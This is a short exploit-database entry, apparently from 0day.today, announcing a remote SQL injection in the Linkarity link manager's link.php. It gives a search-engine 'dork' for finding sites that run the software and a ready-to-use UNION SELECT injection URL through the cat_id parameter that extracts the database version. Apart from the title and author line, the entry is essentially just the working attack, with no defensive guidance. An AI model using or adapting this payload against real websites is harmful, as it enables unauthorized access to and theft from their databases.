id: 3667
date: 09/12/2008
title: Linkarity (link.php) Remote SQL Injection Vulnerability
author: Egypt Coder
cves: 

=======================================================
Linkarity (link.php) Remote SQL Injection Vulnerability
=======================================================



Discovered By: Egypt Coder

Dork:  Powered by: Linkarity™


Exploit :

http://localhost/link.php?cat_id=-1+union+select+1,2,3,4,5,6,7,8,version(),version(),11,12,13,14,15,16,17,18



#  0day.today [2023-03-24]  #